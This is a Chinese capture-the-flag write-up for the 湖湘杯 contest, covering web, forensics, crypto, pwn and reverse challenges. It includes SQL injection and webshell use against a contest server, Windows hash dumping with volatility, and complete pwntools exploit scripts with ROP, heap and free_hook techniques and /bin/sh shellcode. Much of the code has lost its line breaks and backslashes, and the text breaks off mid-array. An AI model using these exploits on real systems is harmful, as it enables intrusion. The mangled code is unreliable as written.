湖湘杯-WriteUp

  • A+
所属分类:逆向工程

Web

题目名字不重要反正题挺简单的

解题思路

非预期,DASFLAG变量在phpinfo里显示出来了

湖湘杯-WriteUp


 

NewWebsite

解题思路

http://47.111.104.169:56200/?r=content&cid=2

cid参数存在SQL注入漏洞,没有任何过滤,得到后台账号密码为admin/admin

进入后台发现水印图片那里有个php3文件,访问是phpinfo,没什么用

湖湘杯-WriteUp



然后访问/upload/watermark/目录,发现可以目录遍历,有可以解析的shell文件

湖湘杯-WriteUp

http://47.111.104.169:56200/upload/watermark/82061604228330.php3

盲猜密码cmd

湖湘杯-WriteUp



Misc

password

下载后解压发现WIN-BU6IJ7FI9RU-20190927-152050.raw文件

直接拖到kali用volatility分析

volatility -f WIN-BU6IJ7FI9RU-20190927-152050.raw imageinfo

判断为Win7SP1x86

湖湘杯-WriteUp

volatility -f WIN-BU6IJ7FI9RU-20190927-152050.raw --profile=Win7SP1x86 hivelist

获取SAM文件虚拟地址

湖湘杯-WriteUp


volatility -f WIN-BU6IJ7FI9RU-20190927-152050.raw --profile=Win7SP1x86 hashdump -y 0x93fc41e8

导出Hash

湖湘杯-WriteUp

CTF用户的hash拿去解密,密码明文为:qwer1234

然后sha1


db25f2fc14cd2d2b1e7af307241f548fb03c312a


颜文字

解题思路

题目是颜文字,其实和颜文字没啥关系。

wireshark打开数据包,发现有个index_demo.html的文件,把里面的内容复制出来保存在本地。

湖湘杯-WriteUp

本地打开,右键查看源码发现一些类似base64的东西



KO+9oe+9peKIgO+9pSnvvonvvp7ll6hIaX4gCm==KO+8oF/vvKA7KSjvvKBf77ygOyko77ygX++8oDspCr==                                KCtfKyk/KOOAgj7vuL88KV/OuCjjgII+77i/PClfzrgK                                  bygq77+j4pa977+jKinjg5bjgpwK                                                  77yc77yI77y+77yN77y+77yJ77yeKOKVr+KWveKVsCAp5aW96aaZfn4K                      44O9KOKcv+++n+KWve++nynjg44o77yg77y+77yQ77y+KQp=                            KF5e44Kezqgo77+j4oiA77+jKc6oKuKYhSzCsCo6LuKYhijvv6Pilr3vv6MpLyQ6Ki7CsOKYhSog44CCCp==flwo4omn4pa94ommKS9+byhe4pa9XilvKMKs4oC/wqwpKCriiafvuLbiiaYpKSjvv6Pilr3vv6MqICnjgp7ilLPilIHilLMo4pWv4oC14pah4oCyKeKVr++4teKUu+KUgeKUuwp=4pSz4pSB4pSzIOODjigg44KcLeOCnOODjingsqBf4LKgCn==                         4LKgX+CyoCjila/igLXilqHigLIp4pWv54K45by577yB4oCi4oCi4oCiKu+9nuKXjyjCrF/CrCApCp==KOODjuOBuO+/o+OAgSlvKO+/o+KUsO+/oyop44Ke4pWwKOiJueeav+iJuSAp77yI77i2Xu+4tu+8iSgqIO+/o++4v++/oyko77+jzrUoI++/oykKKO++n9CU776fKinvvonil4t877+jfF8gPTMo44OO772A0JQp44OOKOKAstC0772Az4Mpz4Mo77+i77i/zKvMv++/ouKYhinvvZ4o44CAVOODrVQpz4M8KCDigLXilqHigLIpPuKUgOKUgAo=KMKsX8KsIiko77+j77mP77+j77ybKSjila/CsOKWocKw77yJ4pWv77i1IOKUu+KUgeKUu+ODvSjjgpzilr3jgpzjgIAp77yNQzwoLzvil4c7KS9+KOODmO+9pV/vvaUp44OY4pSz4pSB4pSzCu==4LKgX+CyoCjila/igLXilqHigLIp4pWv54K45by577yB4oCi4oCi4oCiKu+9nuKXjyjCrF/CrCApCo==KOKKmcuN4oqZKe+8nyjPg++9gNC04oCyKc+DPCgg4oC14pah4oCyKT7ilIDilIDilIDvvKPOtSjilKzvuY/ilKwpMzwoIOKAteKWoeKAsinilIDilIDilIBD77yc4pSAX19fLSl8fO+9nijjgIBU44OtVCnPgyjjgIMK4oqZ77mP4oqZ4oil44O9KCrjgII+0JQ8KW/jgpwvKOOEkm/jhJIpL35+KCNfPC0p77yI77ye5Lq677yc77yb77yJCo==KOODjuOBuO+/o+OAgSlvKO+/o+KUsO+/oyop44Ke4pWwKOiJueeav+iJuSAp77yI77i2Xu+4tu+8iSgqIO+/o++4v++/oyko77+jzrUoI++/oykKKO++n9CU776fKinvvonil4t877+jfF8gPTMo44OO772A0JQp44OOKOKAstC0772Az4Mpz4Mo77+i77i/zKvMv++/ouKYhinvvZ4o44CAVOODrVQpz4M8KCDigLXilqHigLIpPuKUgOKUgAq=KOKKmcuN4oqZKe+8nyjPg++9gNC04oCyKc+DPCgg4oC14pah4oCyKT7ilIDilIDilIDvvKPOtSjilKzvuY/ilKwpMzwoIOKAteKWoeKAsinilIDilIDilIBD77yc4pSAX19fLSl8fO+9nijjgIBU44OtVCnPgyjjgIPvvJ7nm67vvJwpCm==KG/vvp92776fKeODjmQ9PT09PSjvv6Pilr3vv6MqKWLOtT3OtT3OtT0ofu+/o+KWve+/oyl+KOKdpCDPiSDinaQpVeKAouOCp+KAoipVCs==KO++n9CU776fKinvvonil4t877+jfF8gPTMo44OO772A0JQp44OOKOKAstC0772Az4Mpz4Mo77+i77i/zKvMv++/ouKYhinvvZ4o44CAVOODrVQpz4M8KCDigLXilqHigLIpPuKUgOKUgAp=KOKKmcuN4oqZKe+8nyjPg++9gNC04oCyKc+DPCgg4oC14pah4oCyKT7ilIDilIDilIDvvKPOtSjilKzvuY/ilKwpMzwoIOKAteKWoeKAsinilIDilIDilIBD77yc4pSAX19fLSl8fO+9nijjgIBU44OtVCnPgyjjgIPvvJ7nm67vvJwpCr==KG/vvp92776fKeODjmQ9PT09PSjvv6Pilr3vv6MqKWLOtT3OtT3OtT0ofu+/o+KWve+/oyl+KOKdpCDPiSDinaQpVeKAouOCp+KAoipVCt==KO++n9CU776fKinvvonil4t877+jfF8gPTMo44OO772A0JQp44OOKOKAstC0772Az4Mpz4Mo77+i77i/zKvMv++/ouKYhinvvZ4o44CAVOODrVQpz4M8KCDigLXilqHigLIpPuKUgOKUgAr=KOKKmcuN4oqZKe+8nyjPg++9gNC04oCyKc+DPCgg4oC14pah4oCyKT7ilIDilIDilIDvvKPOtSjilKzvuY/ilKwpMzwoIOKAteKWoeKAsinilIDilIDilIBD77yc4pSAX19fLSl8fO+9nijjgIBU44OtVCnPgyjjgIPvvJ7nm67vvJwpCi==KG/vvp92776fKeODjmQ9PT09PSjvv6Pilr3vv6MqKWLOtT3OtT3OtT0ofu+/o+KWve+/oyl+KOKdpCDPiSDinaQpVeKAouOCp+KAoipVCn==KO++n9CU776fKinvvonil4t877+jfF8gPTMo44OO772A0JQp44OOKOKAstC0772Az4Mpz4Mo77+i77i/zKvMv++/ouKYhinvvZ4o44CAVOODrVQpz4M8KCDigLXilqHigLIpPuKUgOKUgAo=KOKKmcuN4oqZKe+8nyjPg++9gNC04oCyKc+DPCgg4oC14pah4oCyKT7ilIDilIDilIDvvKPOtSjilKzvuY/ilKwpMzwoIOKAteKWoeKAsinilIDilIDilIBD77yc4pSAX19fLSl8fO+9nijjgIBU44OtVCnPgyjjgIPvvJ7nm67vvJwpCp==KG/vvp92776fKeODjmQ9PT09PSjvv6Pilr3vv6MqKWLOtT3OtT3OtT0ofu+/o+KWve+/oyl+KOKdpCDPiSDinaQpVeKAouOCp+KAoipVCq==KG/vvp92776fKeODjmQ9PT09PSjvv6Pilr3vv6MqKWLOtT3OtT3OtT0ofu+/o+KWve+/oyl+KOKdpCDPiSDinaQpVeKAouOCp+KAoipVCl==KO++n9CU776fKinvvonil4t877+jfF8gPTMo44OO772A0JQp44OOKOKAstC0772Az4Mpz4Mo77+i77i/zKvMv++/ouKYhinvvZ4o44CAVOODrVQpz4M8KCDigLXilqHigLIpPuKUgOKUgAq=KOKKmcuN4oqZKe+8nyjPg++9gNC04oCyKc+DPCgg4oC14pah4oCyKT7ilIDilIDilIDvvKPOtSjilKzvuY/ilKwpMzwoIOKAteKWoeKAsinilIDilIDilIBD77yc4pSAX19fLSl8fO+9nijjgIBU44OtVCnPgyjjgIPvvJ7nm67vvJwpCl==KG/vvp92776fKeODjmQ9PT09PSjvv6Pilr3vv6MqKWLOtT3OtT3OtT0ofu+/o+KWve+/oyl+KOKdpCDPiSDinaQpVeKAouOCp+KAoipVCi==KOKVr+KAteKWoeKAsinila/ngrjlvLnvvIHigKLigKLigKIK                         KOKVr+KAteKWoeKAsinila/ngrjlvLnvvIHigKLigKLigKIK                           KOKVr+KAteKWoeKAsinila/ngrjlvLnvvIHigKLigKLigKIK                         KOKVr+KAteKWoeKAsinila/ngrjlvLnvvIHigKLigKLigKIo4pWv4oC14pah4oCyKeKVr+eCuOW8ue+8geKAouKAouKAoijila/igLXilqHigLIp4pWv54K45by577yB4oCi4oCi4oCiKOKVr+KAteKWoeKAsinila/ngrjlvLnvvIHigKLigKLigKIKZmxhZ+iiq+aIkeeCuOayoeS6huWTiOWTiOWTiC==

网上搜了一下发现这是base64隐写,网上有现成的脚本

https://www.it610.com/article/1290949422569562112.htm

把base64隐写的东西保存成code.txt,解密脚本

def get_base64_diff_value(s1, s2):    base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'    res = 0    for i in xrange(len(s2)):        if s1[i] != s2[i]:            return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))    return res

def solve_stego(): with open('code.txt', 'rb') as f: file_lines = f.readlines() bin_str = '' for line in file_lines: steg_line = line.replace('n', '') norm_line = line.replace('n', '').decode('base64').encode('base64').replace('n', '') diff = get_base64_diff_value(steg_line, norm_line) print diff pads_num = steg_line.count('=') if diff: bin_str += bin(diff)[2:].zfill(pads_num * 2) else: bin_str += '0' * pads_num * 2 print goflag(bin_str)

def goflag(bin_str): res_str = '' for i in xrange(0, len(bin_str), 8): res_str += chr(int(bin_str[i:i + 8], 2)) return res_str

solve_stego()

运行完输出了一个key

湖湘杯-WriteUp

然后将index_demo.html进行snow解密得到以下内容     湖湘杯-WriteUp

base64隐写,snow解密,转莫斯

67b33e39b5105fb4a2953a0ce79c3378


隐藏的秘密

解题思路      湖湘杯-WriteUp      

提示计算机中没有这个用户,但是还是可以登录。众所周知隐藏账号一般为:test$这种。

接着用volatility分析这个附件,判断版本为Win2003SP2x86

湖湘杯-WriteUp

列出SAM表的用户     湖湘杯-WriteUp

然后拿得到的密文批量解ntml,将得到的明文信息和用户名对应,例如




JbpPIa4$:980099vz1rKjG$:565656yW1fMSd$:19861013oR9C4h0$:a520520etiH3Lp$:321321

接着把这些批量md5加密即可

然后去平台爆破flag,由于第一次爆破忘记截图,后面再次尝试就不行了,所以没有最后出flag的那张图。


虚实之间

解题思路

可以先将附件中的mingwen的副本文件分离出来

修复数据包用winrar自带的或者7z直接能把mingwen副本.txt解压出来

使用ARCHPR对加密的文件进行明文爆破

爆破之后得到密码

进入原加密文件

       湖湘杯-WriteUp      

再栅栏

湖湘杯-WriteUp


Crypto

题古典美++

解题思路

SZWLVSRVVZICMUOJYIIZBSVSSITFSWHPCWCFPVPFXJMWRVJICVRGTCFLHPRJKJKSRVWYFUSEWHFXLHFOSFLYPFXXYFPOEGXFXMBUHVNIYHNDWXPGBXWSYBNDVQRVYRTZUWKTFSKUMVERCCRSBEMKEDRUNYYVRYKXFOKVLVXYGTRQZOEHFEYKJRKRVXFPBOINXFTCSRQCKIGBXWLVOQVVOSFLCRRWXYFQWUHWFGRVVZICMYBUQSKJASUWLRURVVBAVSCTZOPVEUWKKGLQZCRUHJBLRSRSBTFSCYIJICFVDRUUFSIHWYFQONPEGTYBUSMTUSFVVLLOEIGRRGFEGJKIKPMYURAEBHOIIVFNMBVRJKICGYHPMFQOJVLVQYGJHHZUUOJOESFJZVGSIBLUVPEINYZRGISVRHFKIIHPSRWHZTYDGRMEUKSEWMKXYGVPTKZQVVGMUOMHCLOVUMRIRTKICXRUJFSDSRUSWLGZCLRXTMAVESUZQCDDRRHCRKRTLUGHZQXFPLSFIXYFAIGESRSBGRVWYFDSCOTRTRWKZICMRVFXKYUYZZFIKPFSIVICGYTKHVJVAVRIECMYGKKMJJQVROPKIGBBQSKIGBXRJKVKPCLRXEMKEVXRJPGYRASSYJVWLVZJZROPKIGBBPIRUFCDHAYZGKFXPUORGRBEEZRVZQKRCMIKLXVWCBZIMWFJZFIJKICHFSSWUFSYRYJFUVZFLNBQJVUCCJISCBXIVCRFZRUPUBURAEXMICGXYFDOCORVWCFTRQVUMOEHRUJUCEGIIIMKDDRPNGZVVMMFDOCOIECWHYLWKJKSJKIJBGRROSLEGALVXSFESKWMEHQCDHAYFPSEHEIUFSTHRKSCCWWLVFYFKKPVUKSJHIKIYHNRYCEZSWRYIUFCLVEEEKWCHWUPUBZWLZOITFUCFVQSVDPZDCVRGPVBPBKVIMFPOCWLZOEGFIXYJQGFUXZOFSIOIJTMBJLRKICGTKSFMPCFPEEERVFXKYUFWJZEJOMHRYIIZECFGSGQMFKXRZUWTFUWYPUWEJSWGFSINRFXJSUJIRTRVVUINBQBFRRVUMZZVXVORCYHVJUGZCLXNBQUFRHGSYQKLGVUMGRBMKPTSIBIJUFOKVESPSHKKIIJEVKGMJUYBTHFLURVVQMNPLRVUAYBRZRWMKVBSFUPFOEWKXHVJTSXRXKPYZZFIYBBBFLHVBUVRWPRUGHLGINBQCIOSEHGHLGIVJRVVUFLURVFXKYURVVBAVSCBZFIXSYBUZSIEQHFVEPQPSJHRKMWGYHFVHYBRJEZOGKFQHVSGTZVLRMJTROPIJEVKWLIPSUYWLVFYFKKLFXDIEQCZUJZJHIDUMQFPIFVRODRRXUFSGHSGMCHYDXNBJYNLXYUFSZULVBBGURAEXYFUWLVBLHZSEKIGSJLXYJLYJKINBQFRWLVSEZRGXYFPSNDWEPMBVOMJUCBZQKKIGGKLQVBQWKGMUORGFXRUBROCOXYFPWXKXNPPRSXXZTFOCOLRWCHFDWBUFSDZLRURVVQEDFMTKKITPSBKUCZTWCLNRFXNZVDWVNYODLWKIGGEHAQFYZRQHFSYIJWVRMGORQHJICHILIUUMQLUXJFWOJVLVTNCBHJROAMTXVKTCMZQKRTWCLUIWBJZZQKKIPCLJLKICOZUHFZMIKKMELWCLFSLMBARQEXFGHRQHNIYHRQMXOMFRQXCJRHCHKZSJGYHPCUFWENQVGMFRVOZOEBFLXCMLSMHVUPRCRVOGFPVRSWZTFOCOWVFGHNUMKUCBLSWFNCKYHVV

维吉尼亚密码加密解密,在一般的网站上解密必须有秘钥

github上有一个猜测秘钥开源项目

https://github.com/atomcated/Vigenere

       湖湘杯-WriteUp      

全部改成大写ORDERBY,md5加密一下就是flag

C82BBC1AC4AB644C0AA81980ED2EB25B



LFSXOR

解题思路

题目由两个LFSR伪随机数生成器来生成两个密钥流元

然后分别对content加密了一次,得到两组密文

切入点在于两个密钥流元的周期很短,并且互素,一个是15,一个31

因此第一个密钥流元的某一个密钥存在和第二个密钥流元的每一个密钥加密了同一个明文的情况。

于是根据异或运算的对合性,可以通过爆破一个密钥流元的一个字节来恢复另外整个密钥流元,从而实现对密文的解密。


cipher1 = 'xbbxd3x08x15xc6:x08xb2xb2x9fxe4pxc7xecx7fxfd)xf6fx9cxe4xd12xaeJx81xb1x88xabxa5Vxa9x88x14xdf`~xf6xdbJxb4x06S!0xbbxe4x1axe6Rx8ex84Xx19Kx95x07Cxe8xb2'xa9x80x15xecx8fx8dYnKx85x99xb7!x134xa9xb6x15xcf&rx9bxe1x99xe4]3h~xf0xa9xa5x14xee}xd19lx14hx07v *a0x12x14xfex0fx05xdemx1dxe4s2Jx7fxc28xf6RRx8exbaxb2mx18Mxf1xef!4x17xa8xb4x14xc2x8fxb9Y:Kxaax06T!x1bxbbxfdxf6Gvx8ex9axebxd9Kxbbx06Nx9ax82cxa9xa0x14xed!x04xdbmx13xe5w3Bx7fxd0xa9xbfxb7x9cxe3xd00x83Kx86xab3x7fxc1xbbxfdx11x15xdfx8ex80Yx07xd8xe5]2mxe9xbbxce`x91ox8fx8cY!x81xe4Jx92x8cxa7Tx16Ex15xf1WMY(xb8[x8e2y~xcbMx10x15xc7x1fWYx0cKx87xcexe5 !bxa8x83x14xec6xd1!xc8x905xe52Lxf1xbaxcfnx9dx9dxe7uxadmx06xe4n2rxd8xbaxedxf6x7fx9dxd8xd02mx12Gx07Yx89x7fxc0xa8xa4x15xe5x043Yx1eJxaex07nx94x87xbbxcf_x8dx9dxd1x14Y,x9exe5bxd7x8cx7fxf7xa8x8fx14xc7x8fxb3xb6xf1x93xe4Oxddxc4xdbxbaxf6!x15xfd.xd1x18xcfxf6x03xea2Ex7fxe1xa9xa5xfex9dxc9xd1;xd9xeex05x06zxc8xb2xbbxe2xf7{JW4xcdmx1axe5Ux8d x0f&x14x7fxf6x9dxd4Exbfxc3xdbxe4Lxe1xf7x90xbbxdaZxf4x9dxd13xb8m3xe2D3o~xf8Hxf6U*x07lYx03Kxabx07~xa3x87xbbxc9xf7sAQx08Y6Jx86x07Yxecxf7xbbxc6sx15xc6x7fEYx02Jx95x07Z x11xbbxc6Tx15xfc-xd0x06xe6x9f-x07^ x15xbbxcczx14xf3x8fx97xd4l9tx85xe8x8axbexbbxf9xf6fx9dxf2xd19xa2Kxb6xcdxcfxf6~xd5xa9xaax15xd8x8exb3x81m9xe4fxb2!x1exbaxd8sxfdx11x08Wxa1l;x01x07_!x11xbbxddxf6xx9dxf0x17Yx15xfex02xc7xa0!.Wxa9xa5x8fx9cxe8xd1x12mx04xe5s3Q~xddxa9xa3x15xdbx8fxacxafxecxbbx10xde2_xbaxbaxe8xf6f.x1exd1x17lx06xe4Uxddxf0xd6~x0fAx14xcbx8exb0Yx1fJxb2xe4xb3!"xbaxfeUx14xedYxd0>l-~x06P 1xbbxf2xf6waDxd1(mx12`[email protected]b6~xfaxa9xb1xb0x9dxfbx18xfbm&xe4v2wxcexbaxcboxd5x07x11QX<Jxbdxb22Ox7fxd8x>xc8x9cxd3xd03x9dxb5x1exd72Sxf2ryxf1Wx9cxc89YrKx8fxffx8axe0xb5{xa9xaexb1x9dxddxd1=xbeKxa3x06e!x08xbaxd2xf6jx9cxf6xd0x0fl#xe5oxf5xaa~xc2xa9x99x15xea6xd1:xe7xa8xe4nxbb nVxa9x91x14xf9}xd0!m/xe5|2ox81xbaxf8rx14xebtRxc9xecxdd`xbfxc6x81xdfKXWxb3o.%xa9xcdxb9x14xfdx97x83x8eOnx03xb6iuuxabx9dxbcx15xf4xc3xd6xc1'cipher2 = 'pxfdx1ffxcaBxa5xe6`x87xa8x8cix855x92O8Pxa5}^xd8xedx1ax88=cxe0x9fxedqxf8xe1%x7fXxd2xbaxbex03xa8x9ax9cx075x98"xcaxedxa4C^xc6.jxecxfax10xa7xd9x01x06x87x90fxccxf6x1bx0cxdexcc,xfbxf0xc74x94xcfjx8ayxd5xd2`[email protected]!DSpxf5x12fxf1xf6#x80xbex16xa8xaeFxd0xd1xd4xadxb9xf7#x16x08xb2[x1ax87x8bxa0xfaEFxbfx86x8bx8cx90xa4xd5xfbcRxe2Wx9cn5x8bxcfQ"xf2x16x10xb2Ix1ax88x8bx8cjx16xebpxccSxd2x90xa8|qx05xafqxfaxcaHE{x1axba#xfdx17/xb2Lx1ax87x8ax90xc9Dmpxefx0efxf2Z|Sx00Rxfcx1cx9dn5x84xceSxb0xa4M_xffxb9x1ax8ax1d\x98D\pxcb*fxdcVxd0xd5Qxecx1axfaxf0x91xa8xd4x8axcax9c-x17x07xb2_xffnx8ax83xfbxc2x00x10x87x83xaeFxf7#xd4xbe'xa9x8a$IMpx14xe8xc0xa4zxd1xb2Hxe6ex8bxb0xcfxb1x01<x87x88gxc2Q|Hxbe9xa9xadx9c#4x8cl8Ix0cx17$xb3}x1bx94x01:j7x00;x86xbdxd2ixf6x1axa4'Rxf6?x9cx08xe1xd4xabxddx8fxa4[_xca/@xedxe86xf7x9cx018ix04xc3x90xa8xaax0cxdexf2xa8xba?xf4xd39xce\"xfex16x0cY/]xedxe9lxcexa5x018o,gxdbxf7x12xdagxb6=xfaxccHgkxcfHxbfx18x9exbdxb3ux8fn$Hkx0exd3xa6ixe1x15=x16}R]xb3xa8x82x9bx0b4x9axcf{xc2xa4Vxe8:x93x1ax83x8ax97jtx82x88x86x80fxf6*xa2xd5xbex08xa9x98x9c#xf8\xceVxa7xa5Lxae&/txecxfbxd9x02Dnpxe8Cfxf0U}R4x87axfbxf0I_xd4xaaxb4"xcax16x18>/i}tx03xc1x84x00!x86x93gxedxf7x1dxc3xbfx01cx06KI[xd5x929gxa4tx87xb2\x1bx8dx0bxd9x0bDpxf5omxe1x16x0e}|[email protected]\cx17&x07xc8xda~x8bx88x86DSxebx87x87fxdaxf73rxcaSxd9xfaxfaI`xd5x889^Rx97xaeFxf6x1ax92Nxd8*Erxc3x16xe0)x91xba|_Qx83x00>;xff5x82xceX"xd7x17x08Pxaex1axb1x8ax8fxc9Epxa7x86x86gxf6m|oxbfx1cxa9xa1x9c+xc9x1excfI#xfcx92^xc1xb8x1bxadx8ax9exceEuxb8$xe0x0bx90x87}[x0fSxcab]xd2xaaUxcfh"xfcxa2_xdd/y<Cx05kx18x00x1awx1ex9cAxf6x0fx80wx83xaexb8x9dx0exdcxd4xaf9H\xafx9eyxefx1bxb4.xd99Ddxa2x87xa7fxc6xf6nx0cxc4Rxd7xfaxe4Hcxd4xa78Jcx9c^xca.uxedxfcak&x8bx92x87x88xeex90x83x90x0cxd9Rxcdx08x9c04xb1xceC"xeaxe9^xe3xd4x1ax9ax0c[xfaxc5x97xf5>x15xc71x06x8dxacx19xa0tx0elxe9xc6%4x9dx80Uxe3xfdFx8dxeex17.+x9bxb3xf0x83wx16xd9'

for one in range(256): turekey = [0]*31 i = 0 for one in range(31): turekey[i % 31] = chr(ord(cipher1[i])^ord(cipher2[i])^ord(one)) i += 15 flag="" for i in range(len(cipher2)): flag+=chr(ord(turekey[i%31])^ord(cipher2[i])) if 'DASCTF' in flag: print flag        

PWN

what the f**k printf?

解题思路

输入完15个0x1f后就可以溢出

from pwn import*

context.log_level = 'debug'elf = ELF('./pwn_printf')p = remote('47.111.96.55',54606)libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')



gadget_list = [0x45226,0x4527a,0xf0364,0xf1207]puts_plt = elf.plt['puts']puts_got = elf.got['puts']pop_rdi_ret = 0x401213



payload = "0x20"*15p.recvuntil('interestingn')p.sendline(payload)payload = "a"*8 payload += p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) +p64(pop_rdi_ret)payload += p64(0x40) + p64(0x4007C6)p.sendline(payload)

#-----------------------------------------puts_addr = u64(p.recv(6).ljust(8,'x00'))libc_base = puts_addr - libc.symbols['puts']var = libc_base + gadget_list[2]#-----------------------------------------

payload = "a"*8payload += p64(var)p.sendline(payload)
p.interactive()737e31e0437d1f6d960ce8d4c887cb9a


Blend_pwn

解题思路

# _*_ coding:utf-8 _*_from pwn import *context.log_level = 'debug'context.terminal=['tmux', 'splitw', '-h']prog = './blend_pwn'#elf = ELF(prog)# p = process(prog)#,env={"LD_PRELOAD":"./libc-2.27.so"})libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")p = remote("47.111.104.169", 57704)def debug(addr,PIE=True):   debug_str = ""  if PIE:    text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)     for i in addr:      debug_str+='b *{}n'.format(hex(text_base+i))    gdb.attach(p,debug_str)   else:    for i in addr:      debug_str+='b *{}n'.format(hex(text_base+i))    gdb.attach(p,debug_str) 

def dbg(): gdb.attach(p)#-----------------------------------------------------------------------------------------s = lambda data :p.send(str(data)) #in case that data is an intsa = lambda delim,data :p.sendafter(str(delim), str(data)) sl = lambda data :p.sendline(str(data)) sla = lambda delim,data :p.sendlineafter(str(delim), str(data)) r = lambda numb=4096 :p.recv(numb)ru = lambda delims, drop=True :p.recvuntil(delims, drop)it = lambda :p.interactive()uu32 = lambda data :u32(data.ljust(4, ''))uu64 = lambda data :u64(data.ljust(8, ''))bp = lambda bkp :pdbg.bp(bkp)li = lambda str1,data1 :log.success(str1+'========>'+hex(data1))

def dbgc(addr): gdb.attach(p,"b*" + hex(addr) +"n c")

def lg(s,addr): print('33[1;31;40m%20s-->0x%x33[0m'%(s,addr))

sh_x86_18="x6ax0bx58x53x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80"sh_x86_20="x31xc9x6ax0bx58x51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80"sh_x64_21="xf7xe6x50x48xbfx2fx62x69x6ex2fx2fx73x68x57x48x89xe7xb0x3bx0fx05"#https://www.exploit-db.com/shellcodes#-----------------------------------------------------------------------------------------

def cho(idx): sla("Enter your choice >",str(idx))

def add(con='a'): cho(2) sla("input note:",con)

def delete(idx): cho(3) sla("index>",idx)def sho(): cho(1)

def show(): cho(4)

def magic(strt): choice(666) sla("Please input what you want:",strt)



def exp(): # debug([0x11cb]) sla("Please enter a name: ","%11$p") ru("wrong!")#-------------------------------------------------------------leak libc sho() ru("Current user:") ru("0x") data = int(r(12),16) addr = data - libc.sym['__libc_start_main']-240 lg('addr',addr) one = addr + 0x4526a





#---------------------------------------------------------------leak heap # magic("a"*0x28) pay = p64(one)*4+p64(0)*12 add(pay) add(pay) delete(0) delete(1) show() ru("index 2:") # ru("0x") heap = uu64(r(6)) lg('heap',heap)

#---------------------------------------------------------------triger lg('one',one) magic(p64(one)*4+p64(heap+0x20)[0:6])#最后四位可以覆盖rbp





it()if __name__ == '__main__': exp()


babyheap

解题思路

# _*_ coding:utf-8 _*_from pwn_debug import *



pdbg=pwn_debug("babyheap")pdbg.context.terminal=['tmux', 'splitw', '-h']context.log_level='debug'pdbg.local("./libc.so.6")#32/64pdbg.debug("2.27")pdbg.remote('47.111.104.169',56303)

switch=3if switch==1: p=pdbg.run("local")elif switch==2: p=pdbg.run("debug")elif switch==3: p=pdbg.run("remote")#-----------------------------------------------------------------------------------------s = lambda data :p.send(str(data)) #in case that data is an intsa = lambda delim,data :p.sendafter(str(delim), str(data)) sl = lambda data :p.sendline(str(data)) sla = lambda delim,data :p.sendlineafter(str(delim), str(data)) r = lambda numb=4096 :p.recv(numb)ru = lambda delims, drop=True :p.recvuntil(delims, drop)it = lambda :p.interactive()uu32 = lambda data :u32(data.ljust(4, ''))uu64 = lambda data :u64(data.ljust(8, ''))bp = lambda bkp :pdbg.bp(bkp)

def bpp(): bp([])# input()



def dbg(arg): bp([arg]) #input()def lg(s,addr): print('33[1;31;40m%20s-->0x%x33[0m'%(s,addr))

elf=pdbg.elf# libc=pdbg.libcsh_x86_18="x6ax0bx58x53x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80"sh_x86_20="x31xc9x6ax0bx58x51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80"sh_x64_21="xf7xe6x50x48xbfx2fx62x69x6ex2fx2fx73x68x57x48x89xe7xb0x3bx0fx05"#https://www.exploit-db.com/shellcodes#-----------------------------------------------------------------------------------------libc = ELF("./libc.so.6")

def cho(idx): sla(">>",str(idx))

def add(): cho(1) # sla("input note:",con)

def delete(idx): cho(4) sla("index?",idx)



def show(idx): cho(2) sla("index?",str(idx))

def edit(idx,sz,con): cho(3) sla("index?",str(idx)) sla("Size:",str(sz)) sa("Content:",con)

def exp(): # debug([0xB0C]) #-----------------------------------------leak libc & heap show(-14) ru('n') data = uu64(r(6)) lg('data',data) addr = data - libc.sym['_IO_2_1_stdout_'] lg('addr',addr) fh = addr+libc.sym['__free_hook'] sys = addr+libc.sym['system'] lg('sys',sys)

#-----------------------------------------shell#下面的操作类似于lctf2018-pwn-easy_heap

#------------------------step1 for i in range(7): add() for i in range(3): add()# 7 8 9 for i in range(6): delete(i) delete(9)

for i in range(6,9): delete(i) #------------------------step2 for i in range(7): add() add()#7 add()#8 add()#9

for i in range(6): delete(i) delete(8)#tcache delete(7) add() # dbg() # raw_input() edit(0,0xf8,'a') delete(6) delete(9) #------------------------step3 for i in range(7): add() add() add() add() delete(9) edit(4,0x20,'/bin/shx00') edit(0,0x20,p64(fh))

add() add() edit(11,8,p64(sys)) delete(4)



# dbg()

it()if __name__ == '__main__': exp()


Reverse

easyZ

刚开始静态分析一直报错,搞得以为是我的电脑的问题。

尝试动态调试无意间发现qemu这玩意。

然后继续搭建环境,动态调试。

感觉等找到的时候高数也就不是什么问题了。不过还是强,还是被找到了。

该反击了,开始后开始反向定位,找到反汇编,看着指令一点一点的调试。

程序就是先判断输入长度,然后加密比较。

也不想搞花里胡哨的,直接爆破不香吗?不禁感叹就这???


 a = [     0x0000b2b0, 0x00006e72, 0x00006061, 0x0000565d,     0x0000942d, 0x0000ac79, 0x0000391c, 0x0000643d,     0x0000ec3f, 0x0000bd10, 0x0000c43e, 0x00007a65,     0x0000184b, 0x0000ef5b, 0x00005a06, 0x0000a8c0,     0x0000f64b, 0x0000c774, 0x000002ff, 0x00008e57,     0x0000aed9, 0x0000d8a9, 0x0000230c, 0x000074e8,     0x0000c2a6, 0x000088b3, 0x0000af2a, 0x00009ea7,     0x0000ce8a, 0x00005924, 0x0000d276, 0x000056d4,     0x000077d7, 0x0000990e, 0x0000b585, 0x00004bcd,     0x00005277, 0x00001afc, 0x00008c8a, 0x0000cdb5,     0x00006e26, 0x00004c22, 0x0000673f, 0x0000daff,     0x00000fac, 0x000086c7, 0x0000e048, 0x0000c483,     0x000085d3, 0x00002204, 0x0000c2ee, 0x0000e07f,     0x00000caf, 0x0000bf76, 0x000063fe, 0x0000bffb,     0x00004b09, 0x0000e5b3, 0x00008bda, 0x000096df,     0x0000866d, 0x00001719, 0x00006bcf, 0x0000adcc,     0x00000f2b, 0x000051ce, 0x00001549, 0x000020c1,     0x00003a8d, 0x000005f5, 0x00005403, 0x00001125,     0x00009161, 0x0000e2a5, 0x00005196, 0x0000d8d2,     0x0000d644, 0x0000ee86, 0x00003896, 